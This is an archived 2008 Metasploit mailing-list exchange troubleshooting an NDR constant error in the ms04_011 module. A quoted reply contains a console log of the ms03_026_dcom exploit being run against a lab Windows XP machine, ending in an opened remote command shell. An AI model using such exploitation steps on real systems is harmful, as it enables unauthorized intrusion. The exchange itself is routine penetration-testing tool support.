Metasploit mailing list archives

Exploit failed: uninitialized constant Msf::ModuleSet::NDR


From: jrogosky at gmail.com (Justin Rogosky)
Date: Sun, 10 Aug 2008 18:45:23 -0400

Yes, it binds successfully.  It gets to the point where it is building
the stub and uses NDR.UnicodeConformantVaryingStringPreBuilt(str)
to build the stub for Windows XP.  This is also the first mention of NDR
in the ms04_011 exploit.  The ms03_026 is different, but same
principle.  

--Justin



On Sun, 2008-08-10 at 17:10 +1000, Patrick Webster wrote:
Hmm works fine here. Tested on an unpatched XP box using the trunk.
Does it bind to the RPC endpoint successfully?

I am using versions:

Framework: 3.2-release.5378
Console  : 3.2-release.5544

msf exploit(ms03_026_dcom) > info

       Name: Microsoft RPC DCOM Interface Overflow
    Version: 4498

msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.209.128[135]
...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.209.128[135]
...
[*] Sending exploit ...
[*] The DCERPC service did not reply to our request
[*] Command shell session 1 opened (192.168.209.12:53351 ->
192.168.209.128:4444)
msf exploit(ms03_026_dcom) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.



C:\WINDOWS\system32>




Current thread: